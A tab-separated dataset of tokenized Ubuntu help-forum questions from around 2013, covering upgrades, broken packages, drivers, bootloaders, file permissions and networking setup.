367135	any other distros with gnome 2.32 ?	i 've used ubuntu for almost a year and i pretty much do n't like the unity environment and i installed backtrack r3 in my laptop which uses gnome 2.32 and i 'm much impressed with that and made a decision to move to gnome but , it is currently in version 3.x and it has been said that there is no gnome 2.x versions are supported . i do n't like the new gnome and surfed the internet for finding a distro with that version and support . but , i ca n't find one . can you specify a good distro with gnome 2.x and debian package installers ?
367136	how do i read a variable from a file ?	i want to insert in my script a value ( string ) that i would read from a text file . for example , instead of : echo `` enter your name '' read name i want to read a string from another text file so the interpreter should read the string from the file and not the user input .
367138	ubuntu 13.10 alongside ubuntu 12.04 - how do i change boot	i installed ubuntu 13.10 alongside ubuntu 12.04 the system still boots up 12.04 how do i boot up 13.10 ?
367140	how enable inbuilt graphic card in 12.04 ?	i have a 12 year old p4 desktop with 1 gb ram and 128 mb on chip graphics . recently i have shifted form windows to ubuntu , so i am a beginner in ubuntu . upon the suggestions made , i have put the following command in the terminal : - lspci | grep vga which gave the following output : - 00:02.0 vga compatible controller : intel corporation 82845g/gl [ brookdale-g ] /ge chipset integrated graphics device ( rev 03 ) this graphic card is present right from the time i have purchased the desktop . i have not added any other graphic cards or any other peripherals . please suggest what to do further .
367142	ubuntu 13.04 to 13.10 upgrade failure	i 'm trying to upgrade ubuntu my ubuntu 13.04 to 13.10 , but there is always this error : error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //archive.canonical.com/dists/ [ distro ] /partner/source/sources 404 not found [ ip : 91.189.92.150 80 ] , e : some index files failed to download . they have been ignored , or old ones used instead . it 's not the internet connection problem . my internet works fine ... . i have good connection . can someone help me with this problem ? thanx
367147	how to host a repository like ppa in my own site ?	as launchpad does not support binary uploads , i want to make .deb packages and host them in my own github website . how to do it ? when done , how to install packages from it ?
367149	can you help me fix my broken packages ?	i would like to upgrade from 13.04 to 13.10 , but some broken packages are preventing upgrade success : grep broken /var/log/dist-upgrade/apt.log output : broken libwayland-client0 : amd64 conflicts on libwayland0 [ amd64 ] < 1.0.5-0ubuntu1 > ( libs ) ( < 1.1.0 ) broken libunity9 : amd64 breaks on unity-common [ amd64 ] < 7.0.0daily13.06.19~13.04-0ubuntu1 > ( gnome ) ( < 7.1.2 ) broken cups-filters : amd64 conflicts on ghostscript-cups [ amd64 ] < 9.07~dfsg2-0ubuntu3.1 > ( text ) broken libpam-systemd : amd64 conflicts on libpam-xdg-support [ amd64 ] < 0.2-0ubuntu2 > ( admin ) broken libharfbuzz0a : amd64 breaks on libharfbuzz0 [ amd64 ] < 0.9.13-1 > ( libs ) broken libharfbuzz0a : amd64 breaks on libharfbuzz0 [ i386 ] < 0.9.13-1 > ( libs ) broken libunity-scopes-json-def-desktop : amd64 conflicts on libunity-common [ amd64 ] < 6.90.2daily13.04.05-0ubuntu1 > ( gnome ) ( < 7.0.7 ) broken libunity-scopes-json-def-desktop : amd64 conflicts on libunity-common [ i386 ] < none > ( none ) ( < 7.0.7 ) broken libaccount-plugin-generic-oauth : amd64 conflicts on account-plugin-generic-oauth [ amd64 ] < 0.10bzr13.03.26-0ubuntu1.1 > ( gnome ) ( < 0.10bzr13.04.30 ) broken libaccount-plugin-generic-oauth : amd64 breaks on account-plugin-generic-oauth [ amd64 ] < 0.10bzr13.03.26-0ubuntu1.1 > ( gnome ) ( < 0.10bzr13.04.30 ) broken libmutter0b : amd64 breaks on libmutter0a [ amd64 ] < 3.6.3-0ubuntu2 > ( libs ) broken python3-aptdaemon.pkcompat : amd64 breaks on libpackagekit-glib2-14 [ amd64 ] < 0.7.6-3ubuntu1 > ( libs ) ( < = 0.7.6-4 ) broken apache2 : amd64 conflicts on apache2.2-common [ amd64 ] < 2.2.22-6ubuntu5.1 > ( httpd ) broken chromium-codecs-ffmpeg-extra : amd64 conflicts on chromium-codecs-ffmpeg [ amd64 ] < 28.0.1500.71-0ubuntu1.13.04.1 - > 29.0.1547.65-0ubuntu2 > ( universe/web ) broken unity-scope-home : amd64 conflicts on unity-lens-shopping [ amd64 ] < 6.8.0daily13.03.04-0ubuntu1 > ( gnome ) broken libsnmp30 : amd64 breaks on libsnmp15 [ amd64 ] < 5.4.3~dfsg-2.7ubuntu1 > ( libs ) broken apache2.2-bin : amd64 breaks on gnome-user-share [ amd64 ] < 3.0.4-0ubuntu1 > ( gnome ) ( < 3.8.0-2~ ) broken libgjs0d : amd64 conflicts on libgjs0c [ amd64 ] < 1.34.0-0ubuntu1 > ( libs ) broken unity-gtk2-module : amd64 conflicts on appmenu-gtk [ amd64 ] < 12.10.3daily13.04.03-0ubuntu1 > ( libs ) broken lib32asound2 : amd64 depends on libasound2 [ amd64 ] < 1.0.25-4ubuntu3.1 - > 1.0.27.2-1ubuntu6 > ( libs ) ( = 1.0.25-4ubuntu3.1 ) broken unity-gtk3-module : amd64 conflicts on appmenu-gtk3 [ amd64 ] < 12.10.3daily13.04.03-0ubuntu1 > ( libs ) broken activity-log-manager : amd64 conflicts on activity-log-manager-common [ amd64 ] < 0.9.4-0ubuntu6.2 > ( utils ) broken libgtksourceview-3.0-0 : amd64 depends on libgtksourceview-3.0-common [ amd64 ] < 3.6.3-0ubuntu1 - > 3.8.2-0ubuntu1 > ( libs ) ( < 3.7 ) broken icaclient : amd64 depends on lib32asound2 [ amd64 ] < 1.0.25-4ubuntu3.1 > ( libs ) broken libunity-core-6.0-5 : amd64 depends on unity-services [ amd64 ] < 7.0.0daily13.06.19~13.04-0ubuntu1 - > 7.1.2+13.10.20131014.1-0ubuntu1 > ( gnome ) ( = 7.0.0daily13.06.19~13.04-0ubuntu1 ) broken libbamf3-1 : amd64 depends on bamfdaemon [ amd64 ] < 0.4.0daily13.06.19~13.04-0ubuntu1 - > 0.5.1+13.10.20131011-0ubuntu1 > ( libs ) ( = 0.4.0daily13.06.19~13.04-0ubuntu1 ) broken apache2-bin : amd64 conflicts on apache2.2-bin [ amd64 ] < 2.2.22-6ubuntu5.1 - > 2.4.6-2ubuntu2 > ( httpd ) ( < 2.3~ ) output for cat /etc/apt/sources.list /etc/apt/sources.list.d/*.list # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //de.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //de.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ raring universe deb http : //de.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //de.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //de.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main # deb-src http : //extras.ubuntu.com/ubuntu raring main # deb http : //linux.dropbox.com/ubuntu precise main output for sudo dpkg -l | grep -e `` ^iu '' -e `` ^rc '' : rc ibm-lotus-cae 8.5.2-20100805.0821 i386 ibm lotus composite application editor rc ibm-lotus-cae-nl1 8.5.2-20100805.0821 i386 ibm lotus cae nl1 rc ibm-lotus-feedreader 8.5.2-20100805.0821 i386 feeds for ibm lotus notes 8.5.2 rc ibm-lotus-feedreader-nl1 8.5.2-20100805.0821 i386 ibm lotus feed reader nl1 rc ibm-lotus-notes 8.5.2-20100805.0821 i386 ibm lotus notes rc ibm-lotus-notes-core-de 8.5.2-20100805.0821 i386 ibm lotus notes native german ( de ) rc ibm-lotus-notes-nl1 8.5.2-20100805.0821 i386 ibm lotus notes java nl1 rc ibm-lotus-sametime 8.5.2-20100805.0821 i386 ibm lotus sametime rc ibm-lotus-symphony 8.5.2-20100805.0821 i386 ibm lotus symphony rc ibm-lotus-symphony-nl1 8.5.2-20100805.0821 i386 ibm lotus symphony nl1 rc libapache2-mod-php5filter 5.4.9-4ubuntu2.2 amd64 server-side , html-embedded scripting language ( apache 2 filter module ) rc libavcodec53 : amd64 6:0.8.6-1ubuntu2 amd64 libav codec library rc libavutil51 : amd64 6:0.8.6-1ubuntu2 amd64 libav utility library rc libmotif4 : amd64 2.3.3-7ubuntu1 amd64 open motif - shared libraries rc linux-image-3.8.0-25-generic 3.8.0-25.37 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-25-generic 3.8.0-25.37 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp
367150	how to share images on facebook via default image viewer	can i share images directly from ubuntu 13.10 default image viewer ? is there any other app that can do it ? i do n't want to open browser , navigate to facebook and upload there .
367154	launcher minimized window	i open a windows and minimize it . then , i want to open the minimized window so i click on the files icon on the launcher but it opens /home/user again . how can i fix it ? thanks in advance .
367158	how to install heartbeat ?	i need to setup a linux cluster . for that , heartbeat is used in centos . is there a heartbeat package for ubuntu as well , and if so , how can i install it ?
367164	ca n't install my microdia webcam	lsusb 's output : 0c45:6029 microdia triplex i-mini pc camera i have tried to install the driver from http : //repo.or.cz/r/microdia.git but it seems to be abandoned and does't work . how can i get it working ? thanks in advance .
367166	installing ubuntu by usb	hello i had a problem with installing ubuntu 's latest version on my windows , i tried to use a usb stick put universal-usb-installer in it , i chose the file and where do i want to install but `` create '' icon does n't appear . what should i do ?
367168	getting spim ( mips compiler ) on ubuntu 12.04	i want to install spim ( mips compiler ) to my ubuntu 12.04 machine .is there anyone to help me ?
367170	how backup and restore horde manualy	how can i backup and restore my horde sql database the databse ist located in /var/lib/mysql/horde there are many *.frm files and one db.opt my server ist broken , so i want to reinstall it . can i copy this files to a usb stick , then restore the entire server without horde and then simply copy the files in the same directory ? or habe i do something like `` mysqldump '' to delete an reinztall the database ? thank you , thomas
367171	every time i open 2 or more windows - it crashes - restart itself	i have ubuntu 12.04 lts , and problem is that every time i open 2 or more windows - it crashes - restart itself . sometimes it crash when i just type something - what is the problem ? what other ubuntu program would you recommend instead 12.04 ?
367172	hp 530 ubuntu 12.04 no wireless	i have a hp 530 laptop with ubuntu 12.04 installed . with vista i could use the wireless hardware of it , but now it does n't work . i have tried using the code : sudo rfkill unblock all does anyone know what i should do ? edit : i have a broadcom wireless card
367176	commands do n't have permission when using absolute path	i have folders set up this way : /srv/samba/video getfacl /srv/samba/video # file : srv/samba/video # owner : root # group : nogroup user : :rwx group : : -- - group : sambaclients : rwx group : deluge : rwx mask : :rwx other : : -- - default : user : :rwx default : group : : -- - default : group : sambaclients : rwx default : group : deluge : rwx default : mask : :rwx default : other : : -- - that means , user deluge has rwx to folder /srv/samba/video . however , when running command as user deluge , i am getting weird permission errors . when in folder /srv/samba/video : sudo -u deluge mkdir foo works flawlessly . but when using absolute path : sudo -u deluge mkdir /srv/samba/video/foo i am getting permission denied . when running sudo -u deluge id , i get output uid=113 ( deluge ) gid=124 ( deluge ) skupiny=124 ( deluge ) which shows that user deluge is indeed in group deluge . also , the behavior was the same when i gave the permissions also to user deluge not just group deluge . when executing as non-system user , it does work . the reason that i want to use absolute paths is that i am using automatically triggered post-download script which extracts some files into the folder . i have spent way too many hours to solve this problem myself . mkdir is n't the only command that fails , touch is doing the same thing , so i suspect that it 's not mkdir 's fault . if you need more info , i will try to put it in here , just ask . thanx in advance . edit : it seems that the root of the problem is acl set on perent folder /srv/samba , which indeed does not grant permissions to deluge ( but neither denies it ) . getfacl /srv/samba # file : srv/samba # owner : root # group : nogroup user : :rwx group : : -- - group : sambaclients : rwx mask : :rwx other : : -- - default : user : :rwx default : group : : -- - default : group : sambaclients : rwx default : mask : :rwx default : other : : -- - if i grant the permission also to this folder , it suddenly starts to work so i believe that the acl on /srv/samba is somehow denying the permissions to deluge . so the question is : how do i set acl to both /srv/samba and /srv/samba/video so that sambaclients have access to whole /srv/samba and subdirectories and deluge has access only to /srv/samba/video and subdirectories ?
367177	keyboard problem with ubuntu 13.10 when holding key down	i have the fallowing problem after isntalling the new ubuntu os . when i press and hold a key , for example `` p '' it writes one time `` p '' , and while i am holding it the other `` pppp '' that are written come with a huge delay between each other - like 1 second or more . if i want to hold down backspace to delete a string of 5 letters it takes me like 10 seconds to do it . is this a reported problem or does anybody has a solution to this problem ?
367179	how can i enable special fn-keys on my on lenovo s206 ( e.g . touchpad on/off ) ?	i can turn the touchpad off in the mouse settings , but two things wo n't work : the `` disable while typing '' option the standard on/off button for the touch pad wo n't work ( it 's the one with the little touchpad symbol crossed off , on the f6 key ) . i 've tried any of the following combinations : alt+f6 fn+f6 ctrl+f6 super+f6 shift+f6 . almost all the other keys of that kind work , like brightness control , volume control , wifi toggle , but this one and the mic off and camera off wo n't work .
367181	after upgrading to 13.10 , no applications are visible in the application lens	i upgraded from 13.04 to 13.10 and now all icons in the application lens are gone . this is what i tried so far : apt-get install -- reinstall unity-lens-applications unity -- replace and unity -- reset-icons moving ~/.config to ~/.config2 deleting ~/.cache/software-center and ~/.cache/unity most of these things have been suggested in this question : unity applications lens is empty - but all to no avail .
367187	can not install oracle 11r2 on ubuntu 13.10	i tried how can i install oracle 11g r2 ? and this , but i still get this error : ( i already use this command sudo apt-get install gcc make binutils gawk x11-utils rpm build-essential libaio1 libaio-dev libmotif4 libtool expat alien ksh pdksh unixodbc unixodbc-dev sysstat elfutils libelf-dev binutils lsb-cxx libstdc++5 )
367189	problem in wifi connectivity- each time need to fill proxy	each time , i have to fill in the network settings again and again on my ubuntu 12.10 and also it is not showing the the `` apply system wide `` option
367192	how to increase wiggle time in unity launcher ?	i would like to increase the duration of launcher wiggle when there is a new notification in an open program . thanks
367193	how to set vlc for ntsc	i 'll viewing an dvd ( format ntsc ) . i see at this moment not the good film . ( horinzontal lines ) i live in europe and here runs the video 's under pal . hope to see a good info to setting vlc . regards spidey-westland
367198	gnome nanny dose n't work ubuntu 13.10	good morning , i am looking for a other software like the gnome nannylike because he doesnt work on my 13.10 ubuntu i will use that for restricting some words , and limit internet access . i also used the ppa for install the packages . thank you and sorry for my english i am french
367199	lampp running but not working	i installed lampp and for some weeks it was running well , but some days ago it stopped working . i dont have a clue why ... i also can not stop the services or restart them . here are some screenshots :
367200	using ubuntu without any knowledge of linux	can i still install and use ubuntu without any basic knowledge of a linux operating system - do i need any background knowledge of linux to use ubuntu ? if so , what will be the limits of my experience ? also , i heard from http : //www.whylinuxisbetter.net/ that i do n't need any drivers for hardware and peripherals . can somebody shed some light on this statement ? p.s . i do n't know if these questions have been asked yet , i searched for these ( maybe i did n't search hard enough ) , but i did n't find any .
367203	i am not able to install flash plugin in firefox and chromium	youtbe videos are not playing on my system . system asks me to install latest flash player . and when i do so , i am getting the response `` unable to change to sudoers gid : operation not permitted '' the command i am giving is `` sudo apt-get install flashplugin-installer '' i am working on ubuntu 12.10
367207	ubuntu/vnc : too many `` too many security failures ''	i am running ubuntu 12.04 server ( s ) . i use vncserver on them . connection works for some time after launching the server . however , if i connect after few hours or about a day later , i get `` too many security failures '' error . and in between , i do not make any unsuccessful / wrong password attempt . this almost always happens and on multiple servers . 1 ) could it be some bot trying to hack it ? i could not find much in the log . in fact i could not find any info even of my own attempts in the logs . why is this happening and how can i prevent it ? 2 ) when this happens , even waiting for some time does not work . i have to kill and start again - which often defeats the purpose of my vnc session . please help ! regards , jp
367209	keyboard layout changing from uk to us , not showing as changed in settings	my password contains a # symbol in it , and recently i 've found that if i lock my screen and come back i wo n't be able to log in , forcing me to shut down the computer and try again . after one of these reboots and successfully logging in , i then tried installing something in terminal , which required me to enter my password . when i tried to install it though , i kept getting told that my password was wrong . just out of curiosity i tried writing my password where i could see it , and sure enough instead of a # , there was a \ instead . on an uk keyboard the button above the right shift , next to the backspace/enter button , is # , and shift+3 is the gbp symbol . but now it seems to have changed to an us layout , where shift+3 is # , and the # key is . my password is pretty long and this bug is really getting irritating , because it makes me stop and press in each key individually , which makes it take much longer to do anything . also i need to do quite a bit of word processing as well as html coding , and all sorts of keys seem to have been changed , which is obviously going to be a hindrance .
367222	how can i fix playing from ftp source in xbmc on ubuntu 13.10	since i upgraded my ubuntu 13.04 install to ubuntu 13.10 iâ´m unable to play from/browse on any ftp source in xbmc . here is the part of my log with the error : 11:42:15 t:140578939475712 warning : fillbuffer : curl failed with code 28 11:42:15 t:140578939475712 error : ccurlfile : :creadstate : :open , did n't get any data from stream . 11:42:15 t:140578939475712 error : open - failed to open source < ftp : //joost : ********* @ 192.168.2.1/video/films/movie.mkv > . i found a thread on the xbmc forums with the same question but without any useful answers at xbmc forums . how can i fix this ?
367223	enable and disable vpn from bash	i have a number of vpn hosts which i need to access periodically . they are configured and connections work fine off the network manager . i 'd like to be able to enable and disable them as needed from a bash script ( probably via cron or some such , but that has yet to be decided ) . i 'd have thought this was possible but so far i 've drawn a blank . any help would be great . ubuntu 12.04
367226	copy-and-paste current working directory on command line without using the mouse	i am using the terminal quite a lot , but i am frustrated that i repeatedly resort to the mouse in the following situation . i have two terminal tabs open with the current working directories x and y , respectively . in the tab where the directory is x , i want to do this ( as an example ) : cp somefile y the path y could be very long , so my current , and cumbersome , method is to do ctrl+pgup to change tab , write pwd to show y , use the mouse to select the output from pwd , ctrl+pgdown to go back to the first tab , use the mouse again to paste y after cp somefile , using middle-click . surely this procedure must be avoidable , for example by having a shortcut that copies the current working directory without using the mouse . any suggestions ?
367229	can not configure aria2 in apt-fast ( ubuntu 13.10 )	i recently upgraded my ubuntu 12.04 to 13.10 . when i installed apt-fast after installing aria2 , i used this command to set aria2 and 16 connections to download with apt-fast : sudo dpkg-reconfigure apt-fast but in the comming window : i ca n't use aptitude as default package manager when i select aria2 as download helper , then this configuration : aria2c -c -j $ { _maxnum } -k1m -s16 -x16 -i $ { dllist } -- connect-timeout=600 -- timeout=600 -m0 can not be saved and in the next time that i run sudo dpkg-reconfigure apt-fast nothing is changed . so i ca n't download with 16 connections . then i tried to replace this line : _downloader='aria2c -c -j $ { _maxnum } -i $ { dllist } -- connect-timeout=600 -- timeout=600 -m0' with this one : _downloader='aria2c -c -j $ { _maxnum } -k1m -s16 -x16 -i $ { dllist } -- connect-timeout=600 -- timeout=600 -m0' in the file : /usr/bin/apt-fast and even in this file : /usr/sbin/apt-fast but still no chance to download with aria2/16 connections . i did n't have this problem in 12.04 but now i face this in 13.10 . any help will be appreciated . thanx
367230	bumblebee : glxspheres blocks after running a while	i guess i have a problem with the functioning of my nvidia card . the symptoms are like following . when using the command vblank_mode=0 optirun -b primus glxspheres the fan is turning faster and faster and after a while , the image of the spheres is getting blurred and glxspheres blocks with little points appearing on the spheres ; then i need to kill it in the console . i have some screen captures of this , but unfortunately i do not have enough reputation points to post them here . does anyone have any idea of why this is happening ? thanks in advance for any suggestion . for the info , here 's my config : processor 4x intel ( r ) core ( tm ) i5-3230m cpu @ 2.60ghz memory 8069mb ( 3380mb used ) kernel linux 3.5.0-42-generic ( x86_64 ) bios date 07/19/2012 vendor american megatrends inc. ( www.ami.com ) version 4.6.5 board name w3x0et vendor clevo co . host bridge intel corporation 3rd gen core processor dram controller ( rev 09 ) vga compatible controller intel corporation 3rd gen core processor graphics vga compatible controller nvidia corporation gk107m [ geforce gtx 660m ] ( rev ff ) ( prog-if ff )
367235	decryption of windows hdd	is it possible to decrypt a windows hdd ( encrypted using bitlocker and windows 7 ) using ubuntu ? i could not found any information on this ? the problem is i know just the administrator password of my windows pc . anytime i switched the pc on the hdd was decrypted when i logged on to the windows . if i take out my hdd and connect it to the ubuntu pc could i decrypt my hdd and use it ?
367236	grub 2 problem after mac os x update	i have a macbook pro in dual boot mac os x / ubuntu 12.04 ( precise pangolin ) . when i boot it i have a refit menu , and i can chose between mac os x and linux . a few days ago i have updated mac os x from 10.7 ( lion ) to 10.8 ( mountain lion ) using a .dmg image provided by my company . since then when i select linux in refit it says : no bootable device -- insert boot disk and press any key i have tried going to refit partitioning tool . this is what i got : as suggested in mac osx mavericks update refit broken i wanted to fix the issue the same way as andrewm , but i do n't have the option `` mbr table must be updated '' . then i booted on ubuntu 12.04 cd , chose repair broken system , chose root patition /dev/sda6 as this is where my ubuntu file system is . i got a shell , but i do n't really know how to repair the poblem since if it was just windows dual boot . a grub update would solve the issue , but here i do n't know where the grub 2 is installed . here are results from parted , and it is a bit confusing for me as the mac partition is the one with boot : as you can see the entry 1 is an efi system partition and is the boot partition , so i wonder if i should install grub there or in sda6 , which is the ubuntu filesystem . i am not sure should i work on refit shell or ubuntu . unfortunately , i do n't remember where grub was before update . update : using same link above i have tried roundsparrow hilltx answer and installed refind , but the result is same ... . still no bootable device when i select linux . update 2 : just used alternate cd again , mounted on /dev/sda6 and the ran update-grub . it seemed to wok and started listing all my kernels . but after rebooting several times still no bootable device when i select linux in refind . udate 3 : have tried to boot from ubuntu cd and select `` boot from first available filesystem . i got error and dropped to grub rescue shell . i even followed the indications on this link but was unable to boot as i tried to use sdb6 but no luck update 4 as per rob smith request here is out put from ls -l $ ( find /efi -iname `` *.efi '' ) *macosx -rw-r -- r -- @ 1 root admin 55048 29 oct 17:44 /efi/refind/drivers_x64/btrfs_x64.efi -rw-r -- r -- @ 1 root admin 38888 29 oct 17:44 /efi/refind/drivers_x64/ext2_x64.efi -rw-r -- r -- @ 1 root admin 39304 29 oct 17:44 /efi/refind/drivers_x64/ext4_x64.efi -rw-r -- r -- @ 1 root admin 43432 29 oct 17:44 /efi/refind/drivers_x64/hfs_x64.efi -rw-r -- r -- @ 1 root admin 38984 29 oct 17:44 /efi/refind/drivers_x64/iso9660_x64.efi -rw-r -- r -- @ 1 root admin 43656 29 oct 17:44 /efi/refind/drivers_x64/reiserfs_x64.efi -rw-r -- r -- @ 1 root admin 175016 29 oct 17:44 /efi/refind/refind_x64.efi -rw-rw-r -- 1 root admin 73232 7 mar 2010 /efi/tools/dbounce.efi -rw-rw-r -- 1 root admin 763248 7 mar 2010 /efi/tools/dhclient.efi -rw-rw-r -- 1 root admin 67024 7 mar 2010 /efi/tools/drawbox.efi -rw-rw-r -- 1 root admin 71312 7 mar 2010 /efi/tools/dumpfv.efi -rw-rw-r -- 1 root admin 84848 7 mar 2010 /efi/tools/dumpprot.efi -rw-rw-r -- 1 root admin 472912 7 mar 2010 /efi/tools/ed.efi -rw-rw-r -- 1 root admin 143856 7 mar 2010 /efi/tools/edit.efi -rw-rw-r -- 1 root admin 1801008 7 mar 2010 /efi/tools/ftp.efi -rw-r -- r -- @ 1 root admin 47848 29 oct 17:44 /efi/tools/gptsync_x64.efi -rw-rw-r -- 1 root admin 320560 7 mar 2010 /efi/tools/hexdump.efi -rw-rw-r -- 1 root admin 286384 7 mar 2010 /efi/tools/hostname.efi -rw-rw-r -- 1 root admin 534416 7 mar 2010 /efi/tools/ifconfig.efi -rw-rw-r -- 1 root admin 395344 7 mar 2010 /efi/tools/loadarg.efi -rw-rw-r -- 1 root admin 587408 7 mar 2010 /efi/tools/ping.efi -rw-rw-r -- 1 root admin 730416 7 mar 2010 /efi/tools/pppd.efi -rw-rw-r -- 1 root admin 561360 7 mar 2010 /efi/tools/route.efi -rw-rw-r -- 1 root admin 1961712 7 mar 2010 /efi/tools/shell.efi -rw-rw-r -- 1 root admin 750224 7 mar 2010 /efi/tools/tcpipv4.efi -rw-rw-r -- 1 root admin 4048 7 mar 2010 /efi/tools/textmode.efi -rw-rw-r -- 1 root admin 320656 7 mar 2010 /efi/tools/which.efi *linux since ubuntu 12.04 partition is not bootable i had to boot on live cd , so at first your command did n't work : $ ls -l /boot/vmlinuz* $ ls : can not access /boot/vmlinuz* : no such file or directory so i decided to mount my file system : sudo mkdir /media/sda6 sudo mount -t ext4 -r /dev/sda6 /media/sda6 cd /media/sda6/ sudo ls -l boot/vmlinuz* -rw-r -- r -- 1 root root 4965840 apr 25 2012 boot/vmlinuz-3.2.0-23-generic -rw -- -- -- - 1 root root 4965968 may 21 2012 boot/vmlinuz-3.2.0-24-generic -rw -- -- -- - 1 root root 4974672 mar 25 2013 boot/vmlinuz-3.2.0-40-generic -rw -- -- -- - 1 root root 4978416 jun 6 20:24 boot/vmlinuz-3.2.0-48-generic -rw -- -- -- - 1 root root 4978416 jun 18 18:20 boot/vmlinuz-3.2.0-49-generic -rw -- -- -- - 1 root root 4978960 jul 24 20:59 boot/vmlinuz-3.2.0-51-generic -rw -- -- -- - 1 root root 4980336 aug 22 21:41 boot/vmlinuz-3.2.0-53-generic
367237	tftp error code 1 : file not found	when i 'm sending a file through tftp remotely , it shows an error like tftp > put mymibtable.txt /home/amsys/desktop/ error code 1 : file not found what is the problem ? what is the solution ?
367238	how can i delete files based on ( flac ) metadata ?	i have several folders with both flac 24/96 and 16/44.1 files . i want to delete the 24-bit/96 khz files , but leave the others . how do i do this from the command line ? is there a way to systematically sort files by metadata and then use that list with rm ?
367248	how to install virtualbox from command line ?	ok , i a am a newbie . for some reasons , i need to install virtualbox . i see that i can easily install it using the software center , but i trust most the `` apt-get install blahblah '' way , because i find it safer , less buggy , and it helps me accommodate more with the terminal . so , my question is the following : is there a way to install virtual box using a command line ? i would prefer something easy , like `` apt-get install etc '' not unzipping , archiving , etc , because this kind of things i still do n't know how to do from inside the terminal . thank you in advance for your help !
367251	installing through usb flash drive using universal usb installer	i have windows 8 on my computer . while installing through usb flash drive using universal usb installer , the installation wizard is showing that it did n't find any operating system in the computer . it is asking to erase everything in the hard drive and install ubuntu 13.10 . the aim is that i should have both windows 8 ( 64 bit ) and ubuntu 13.10 . ( 64 bit ) . can anyone help me ? thanks in advance .
367252	split reprepro-generated debian repository	i 'm using reprepro to manage my local repository . now i 'm planning to write the repo into 3 dvds . seems there is no option to split pool and indexes in reprepro ... any idea ?
367254	how to upgrade from refit to refind	i have recently installed ubuntu server ( 12.04.3 ) on a macmini1.1 ... the macmini already had osx ( leopard ) on it and i wanted to keep it , so after much research , i used the gpart and fdisk within an `` ubuntu-desktop i386 livecd '' -on-a-usb-stick to shrink the osx partition and then used an installation usb-stick-ubuntu-server-i386 in a similar manner to format the left-over partition and install the ubuntu server on it . everything went fine so far . scary yet flawless process : ) before doing all that - i installed refit . i saw it on oh so many internet-guides , and remembered it from back in the day before i was an it manager & tech ... so i was sure it 'll be the thing to help me out . and indeed it was great , only i missed one very important detail : on refit 's main webpage they clearly state : `` as you may have noticed , refit is no longer actively maintained . please check out refind , a fork that is maintaned and under active development . '' so now all of a sudden i notice this strange phenomenon : my ubuntu server os only boots up properly while i have a screen attached to the machine ( macmini ) . the keyboard & mouse do n't seem to be needed , but if i reboot without a screen being connected , it just gets stuck along the way and i ca n't access it via putty from my not-so-remote windows machine . if i then connect a screen to the macmini , i see it got stuck along the way and there 's no options to be chosen . currently , my only option seems to be rebooting with a connected screen , then unplugging it and connecting it back to my windows-pc , where i use putty for an ssh connection over the lan . i decided to check refit 's website for troubleshooting options , when i suddenly noticed the comment about refind and instantly face-palmed . i saw that the maintainer of refind is here in the forums ( am i right in my realization that it 's rod smith ? so i thought after explaining the situation and how delicate it is for my work - i 'd ask this supposedly simple question : i 've read through the installation guide in the refind site and i still do n't understand how i can replace my current refit with the new refind without having to format anything , nor erase anything , nor delete , nor risk anything in my current system and/or files . can you please help me ?
367257	in kde 4.11.2 saucy with both nvidia and nouveau drivers i have strange artefacts	kde 4.11.2 , ubuntu 13.10 , nvidia/nouveau , system/raster qt graphics system . when opening/closing a window there is a chance , that black blinking line will appear near plasma panel . also when a popup like this one : disappears , it does n't disappear at once , but also blinks ( appears/disappears quickly ) . what can be done in order to solve this problem ?
367260	i am logged out immediately after logging in	after i log in to my user account on ubuntu 13.04 , i get automatically logged out after 1 second of black screen . this happens only with 1 specific user , and i can log in to another account fine . what could have gone wrong ? in which log files should i find my answer ? i installed a vnc server and turned on desktop sharing , and last time i could log in - maybe that is an issue . how can i disable it without gui ?
367261	no boot record when installing 13.04 from usb on winxp	i 'm replacing winxp with 13.04 on an older pc using wubi.exe on a usb stick . i had no problem changing the bios on another system that was a bit newer but when i change the settings on the older pc to boot from usb , i get a dos message saying `` searching for boot record ... not found '' & asked to try again . i do n't have the ability to boot from a live cd so is there a reason why i can boot from a usb on a newer computer but ca n't from an older one ? both have options to choose to boot from usb , but the older one can find no boot record . the system was built on 12/13/01 by american megatrends . since i do n't have enough `` reputation points '' to post the screen shot image , you can see it at http : //img.photobucket.com/albums/v633/boonevillephil/1029131748-00.jpg .
367267	`` add downloaded packages '' does not work	i generated a download list using synaptic . downloaded all files and added downloaded files . but instead of adding , a download page popped up and started to download all of packages again ! i 'm using the repository of mashhad university with ubuntu 13.04 . what 's the problem ? thanks
